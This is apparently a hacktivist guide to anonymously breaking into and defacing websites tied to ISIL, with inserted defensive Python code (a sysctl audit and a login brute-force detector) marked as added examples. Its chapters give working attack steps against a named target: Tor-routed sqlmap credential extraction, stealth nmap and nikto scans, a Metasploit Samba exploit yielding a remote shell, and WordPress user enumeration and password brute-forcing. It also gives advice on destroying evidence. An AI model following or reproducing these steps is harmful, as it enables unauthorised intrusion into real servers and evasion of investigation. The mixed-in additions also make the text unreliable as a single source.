- B1tsh1fter's Legionary Noob guide to Fucking ISIL online.
- https://www.youtube.com/watch?v=V1fMvLbE85E
- Vol 1 Website Defacement (Just in time for fuck ISIL friday.)
- ####################################################################################
- The term "website defacement" refers to any unauthorized changes made to the appearance of either a single webpage, or an entire site.
- Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work
- of system crackers, who break into a web server and replace the hosted website with one of their own.
- 1337 SETUP not for noobs
- ####################################################################################
- Mifi access point.
- https://www.verizonwireless.com/internet-devices/jetpack-mifi-6620l/ $49.99
- Prepaid sim cards
- http://www.ebay.com/sch/Verizon-SIM-Cards/29778/bn_591704/i.html
- https://www.youtube.com/watch?v=RyzKNMQB3OQ
- Fake Name generator
- https://fakena.me/fake-name/
- DAVIS STANDARD WIRELESS REPEATER SOLAR POWERED $200.00
- https://jet.com/product/detail/ca20e31f9fb34add9071c2b1d21c7575
- Turn off SSID broadcast; just type the SSID in at the client.
- SETUP
- ####################################################################################
- Set random mac address first, before connecting to wifi.
- MAC Address Changer for windoze
- https://technitium.com/tmac/
- Download the latest version of the Kali Linux .iso from a free wifi access point & burn on laptop/computer.
- https://www.kali.org/downloads/
- Boot from dvd drive;
- Install onto 16GB usb drive
- (warning do not use "USB persistence" this is different, just install onto the USB drive using Kali graphic install.)
- On This drive;
- CORSAIR Padlock 2 16GB USB 2.0 Flash Drive AES Hardware-based encryption $29.99
- http://www.newegg.com/Product/Product.aspx?Item=N82E16820233128
- Also use LVM encryption in the Kali graphic install options.
- The OS is now dual, numberpad AES hardware encrypted & password AES LVM encrypted.
- When the drive is removed it leaves no trace on the computer.
- Destroy the original Kali install disk by cooking it in a microwave for 3 min,
- shatter into pieces and dump in unmarked dumpster at least 5 blocks from residence (wear thick rubber gloves).
- Set BIOS to boot from the USB drive and away we go.
- IN CASE OF EMERGENCY!!
- Microwave USB drive for 5 min!! This will destroy the internal NAND chip and all data with it.
- Lockdown
- Kali boots with the "root" user enabled by default; this is insecure, so we must change it.
- Enter the following into the terminal;
- sudo adduser an0n
- Then enter a password and leave the info fields blank.
- Add the user to the sudoers list;
- Enter the following into the terminal;
- sudo usermod -a -G sudo an0n
- Disable the root account;
- Enter the following into the terminal;
- sudo passwd -l root
- Reboot and log in as an0n with the password.
- sudo apt-get install logwatch
- sudo apt-get install rkhunter chkrootkit
- In /etc/chkrootkit.conf, change RUN_DAILY to "true" so that it runs regularly, and change "-q" to "" otherwise the output doesn’t make much sense.
- In /etc/default/rkhunter, change CRON_DAILY_RUN and CRON_DB_UPDATE to "true" so it runs regularly. REPORT_EMAIL="[email protected]"
- Add the following lines to /etc/sysctl.d/10-network-security.conf
- # Ignore ICMP broadcast requests
- net.ipv4.icmp_echo_ignore_broadcasts = 1
- # Disable source packet routing
- net.ipv4.conf.all.accept_source_route = 0
- net.ipv6.conf.all.accept_source_route = 0
- net.ipv4.conf.default.accept_source_route = 0
- net.ipv6.conf.default.accept_source_route = 0
- # Ignore send redirects
- net.ipv4.conf.all.send_redirects = 0
- net.ipv4.conf.default.send_redirects = 0
- # Block SYN attacks
- net.ipv4.tcp_max_syn_backlog = 2048
- net.ipv4.tcp_synack_retries = 2
- net.ipv4.tcp_syn_retries = 5
- # Log Martians
- net.ipv4.conf.all.log_martians = 1
- net.ipv4.icmp_ignore_bogus_error_responses = 1
- # Ignore ICMP redirects
- net.ipv4.conf.all.accept_redirects = 0
- net.ipv6.conf.all.accept_redirects = 0
- net.ipv4.conf.default.accept_redirects = 0
- net.ipv6.conf.default.accept_redirects = 0
- # Ignore Directed pings
- net.ipv4.icmp_echo_ignore_all = 1
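A check that the hardening values above are the ones actually in effect, as an added example that is not part of the original paste. It assumes sysctl.d fragments are applied in lexical filename order with the last assignment winning, so a later file such as the hypothetical `99-custom.conf` can silently undo `10-network-security.conf`; the baseline is a subset of the keys listed above.

```python
from pathlib import Path

# Subset of the values the guide writes to 10-network-security.conf.
BASELINE = """
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.log_martians = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
"""

def parse_sysctl(text):
    """Parse sysctl.conf syntax: 'key = value', with '#' or ';' comments."""
    out = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        out[key.strip().lstrip("-")] = " ".join(value.split())
    return out

def effective(fragments):
    """Merge {filename: text}; files apply in lexical order, last wins."""
    merged, origin = {}, {}
    for name in sorted(fragments):
        for k, v in parse_sysctl(fragments[name]).items():
            merged[k], origin[k] = v, name
    return merged, origin

def audit(baseline, fragments, live=None):
    """Return [(key, wanted, got, source_file)] for every drifted setting."""
    merged, origin = effective(fragments)
    actual = merged if live is None else live
    drift = []
    for key, wanted in parse_sysctl(baseline).items():
        got = actual.get(key)
        if got != wanted:
            drift.append((key, wanted, got, origin.get(key, "unset")))
    return drift

def read_live(keys, root="/proc/sys"):
    """Read running values from procfs (dots in a key map to path separators)."""
    live = {}
    for k in keys:
        p = Path(root, *k.split("."))
        if p.is_file():
            live[k] = " ".join(p.read_text().split())
    return live
```

On a real host, pass the contents of the files under /etc/sysctl.d as `fragments` and `read_live(parse_sysctl(BASELINE))` as `live` to compare the running kernel against the baseline.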
- Chapter 1 Anonymity or "No shit sherlock":
- ####################################################################################
- For this chapter, log in to a free wifi access point if possible.
- Install macchanger;
- Enter the following into the terminal;
- sudo apt-get update && sudo apt-get install macchanger
- sudo apt-get install net-tools
- ifconfig
- sudo touch Desktop/MAC.sh && sudo chmod 777 MAC.sh
- sudo nano Desktop/MAC.sh
- !#/bin/bash
- sudo ifconfig enp2s0 down && sudo macchanger -r enp2s0 && sudo ifconfig enp2s0 up
- Very Important!!: Must run the following command on each boot without fail;
- sudo ifconfig eth0 down && sudo macchanger -r eth0 && sudo ifconfig eth0 up
- Fuck VPN's they lie, can get compromised and/or subpoena
- tunnel ALL through tor with the following config:
- Enter into the following into the terminal;
- sudo apt-get install tor && sudo apt-get install firehol &&
- sudo nano /etc/default/firehol
- modify the following in the file to START_FIREHOL=YES
- sudo apt-get install tor
- TOR config
- edit the following to
- sudo nano /etc/tor/torrc
- to this:
- ####start below here####
- VirtualAddrNetworkIPv4 10.192.0.0/10
- AutomapHostsOnResolve 1
- TransPort 9040
- DNSPort 53
- FascistFirewall 1
- FirewallPorts 443
- DataDirectory /var/lib/tor
- PidFile /var/run/tor/tor.pid
- User debian-tor
- ClientOnly
- strictnodes 1
- ExitNodes {us}
- ####end above here#####
- Firehol config
- sudo nano /etc/firehol/firehol.conf
- to this:
- ####start below here####
- version 5
- server_tor_ports="tcp/9050 tcp/9051"
- client_tor_ports="default"
- server_proxy_ports="tcp/9040"
- client_proxy_ports="default"
- server_polipo_ports="tcp/8118"
- client_polipo_ports="default"
- server_dns_ports="udp/53"
- client_dns_ports="default"
- #all incoming DNS goes to port 53 or whatever your torrc's DNSPort is
- #for local redirection make sure your /etc/resolv.conf reads 'nameserver #127.0.0.1
- redirect to 53 inface eth+ proto udp src 192.168.0.0/16 dst not 127.0.0.1 dport 53
- #add to force all incoming tcp traffic to 9040
- #for some reason this will redirect locally generated tcp traffic too
- transparent_proxy "1:65535" 9040 debian-tor inface eth+ user not debian-tor dst not "$UNROUTABLE_IPS"
- interface eth0 dhcp
- policy return
- client dhcp accept
- client all accept
- #allow only outgoing TOR traffic
- interface eth0 internet src not "$UNROUTABLE_IPS"
- client all accept user debian-tor
- #add for local DNS and proxy access
- interface "eth0 lo" local src "192.168.1.2 127.0.0.1" dst "192.168.1.2 127.0.0.1"
- server dns accept
- server privoxy accept
- server tor accept
- server proxy accept
- #add for local TOR socks and control port access
- interface lo internal src 127.0.0.1 dst 127.0.0.1
- server tor accept
- server proxy accept
- ####end above here#####
- Remove iceweasel and install firefox
- Enter the following into the terminal;
- apt-get remove iceweasel &&
- echo -e "\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main" | tee -a /etc/apt/sources.list > /dev/null &&
- apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29 &&
- apt-get update &&
- apt-get install firefox-mozilla-build
- Firefox plugins to install;
- https://addons.mozilla.org/en-US/firefox/addon/cookie-whitelist-with-buttons/
- https://addons.mozilla.org/en-US/firefox/addon/sslpersonas/
- https://addons.mozilla.org/en-US/firefox/addon/ghostery/
- https://addons.mozilla.org/en-US/firefox/addon/smart-https/
- https://addons.mozilla.org/en-US/firefox/addon/noscript/
- https://addons.mozilla.org/en-US/firefox/addon/random-agent-spoofer/
- https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/
- https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
- configure foxyproxy to use tor at 127.0.0.1 9050 socks 4a
- Install proxychains to stay stealth
- Enter the following into the terminal;
- sudo apt-get install proxychains
- Chapter 2 Target Acquired or "How 1337 am I?"
- ####################################################################################
- Enter the following into the terminal;
- sudo proxychains nslookup www.Jihadist.ps
- ####output start####
- Server: 8.8.8.8
- Address: 8.8.8.8#53
- Non-authoritative answer:
- www.Jihadist.ps canonical name = Jihadist.ps.
- Name: Jihadist.ps
- Address: 104.28.##.105
- Name: Jihadist.ps
- Address: 104.28.##.105
- ####output end####
- run sqlmap over tor with random user agent at target page for usernames and passwords;
- Enter the following into the terminal;
- sudo sqlmap --tor --random-agent -a --url=http://forums.Jihadist.ps
- run nmap in a separate terminal while we wait for the results
- Scan the ip with nmap + proxychains to route it over tor
- set to zero ping "-Pn" to avoid detection The
- -Ss option tells nmap to perform a stealth scan, the -A option tells it to try to discover OS;
- Enter the following into the terminal;
- sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105
- Scan the site with nikto + proxychains to route it over tor;
- Enter the following into the terminal;
- sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105
- Scan the site with uniscan + proxychains to route it over tor;
- Enter the following into the terminal;
- sudo proxychains ./uniscan -u https://www.Jihadist.ps/
- The following info should have been obtained with the help of the tor cloaked scanning
- Target ip (from nslookup) 104.28.##.105
- Target OS and Version from nmap.
- kick it oldschool by googling "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit.
- We need to find out the OS and ports and services running on the target system.
- EXAMPLE;
- Once you find the open ports and service like a samba port its party time.
- Fire up Metasploit!
- Enter the following into the terminal;
- msfconsole
- Enter the following into the Metasploit framework console;
- msf >set Proxies socks5:127.0.0.1:9050
- We need to find the version of samba..
- Enter each of the following into the Metasploit framework console;
- msf > use auxiliary/scanner/smb/smb_version
- msf auxiliary(smb_version) >set RHOST 104.28.##.105
- RHOST => 104.28.##.105
- msfauxiliary(smb_version) >set RPORT 445
- RPORT => 445
- msfauxiliary(smb_version) >exploit
- With version in hand, restart msfconsole now we use the appropriate module...
- msfconsole
- msf >set Proxies socks5:127.0.0.1:9050
- msf >use exploit/multi/samba/usermap_script
- msf exploit(usermap_script) > set RHOST 104.28.##.105
- msf exploit(usermap_script) >exploit
- We now have a command shell on the target box!
- Chapter 3 Other methods of infiltration or "Boba fett is dead!"
- ####################################################################################
- If using Wordpress; (Credit to Dr Chaos);
- wpscan –-url wordpress_url
- You should be able to quickly determine the WordPress version, which plugins are installed, and what theme is active when you open the scanner.
- The first thing we will do is look for lines beginning with a red plus (+). These are the known WordPress vulnerabilities.
- If the correct vulnerability exists, you can enumerate a user list from WordPress with the following command:
- wpscan –-url wordpress_url –-enumerate u
- Once user names have been collected, you then can attempt to brute force crack the associated passwords.
- You can also download our custom word list from here: /usr/share/wordlists
- WARNING: DO A SAVE AS OR YOUR BROWSER MAY CRASH
- wget http://www.drchaos.com/public_files/chaos-dictionary.lst.txt
- Brute force the following command:
- wpscan –-url [wordpress_url] –-word list [path_to_world list] –-username [username to bruteforce] –threads [number of threads]
- The result? If you are lucky, you can see WPScan was able to crack the password.
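From the defending side, the user enumeration and password guessing described in this chapter leave a recognisable pattern in the web server's access log. The following is an added example, not part of the original paste: it flags bursts of login POSTs and runs of author/user lookups per client. The thresholds, the choice of `/wp-login.php`, `/xmlrpc.php`, `?author=N` and `/wp-json/wp/v2/users` as indicators, and the sample log lines (documentation IP ranges) are assumptions made for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined Log Format prefix: ip - - [time] "METHOD path HTTP/x" status
LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")
ENUM = re.compile(r"[?&]author=\d+|^/wp-json/wp/v2/users")

def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path, int(status)

def detect(lines, max_posts=5, window=timedelta(seconds=60), max_enum=3):
    """Return {ip: set of findings} for login bursts and user enumeration."""
    posts = defaultdict(deque)   # ip -> timestamps of login POSTs inside the window
    enum = defaultdict(set)      # ip -> distinct enumeration URLs requested
    findings = defaultdict(set)
    for rec in filter(None, map(parse, lines)):
        ip, when, method, path, _ = rec
        if method == "POST" and path.split("?")[0] in LOGIN_PATHS:
            q = posts[ip]
            q.append(when)
            while when - q[0] > window:
                q.popleft()
            if len(q) > max_posts:
                findings[ip].add("login-burst")
        elif ENUM.search(path):
            enum[ip].add(path)
            if len(enum[ip]) >= max_enum:
                findings[ip].add("user-enumeration")
    return dict(findings)

def sample_log():
    """Constructed traffic: one noisy client and one ordinary user."""
    fmt = '{} - - [10/Oct/2023:13:55:{:02d} +0000] "{} {} HTTP/1.1" {} 512'
    rows = [fmt.format("203.0.113.7", i, "GET", f"/?author={i + 1}", 301) for i in range(3)]
    rows += [fmt.format("203.0.113.7", 10 + i, "POST", "/wp-login.php", 200) for i in range(8)]
    rows += [fmt.format("198.51.100.4", 30, "POST", "/wp-login.php", 302),
             fmt.format("198.51.100.4", 31, "GET", "/wp-admin/", 200)]
    return rows
```

Because the guide routes its traffic over Tor, the source address can differ between requests, so per-IP counting should be paired with an application-level lockout or rate limit keyed on the targeted account.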
- To be continued...
- What does the Fawkes say?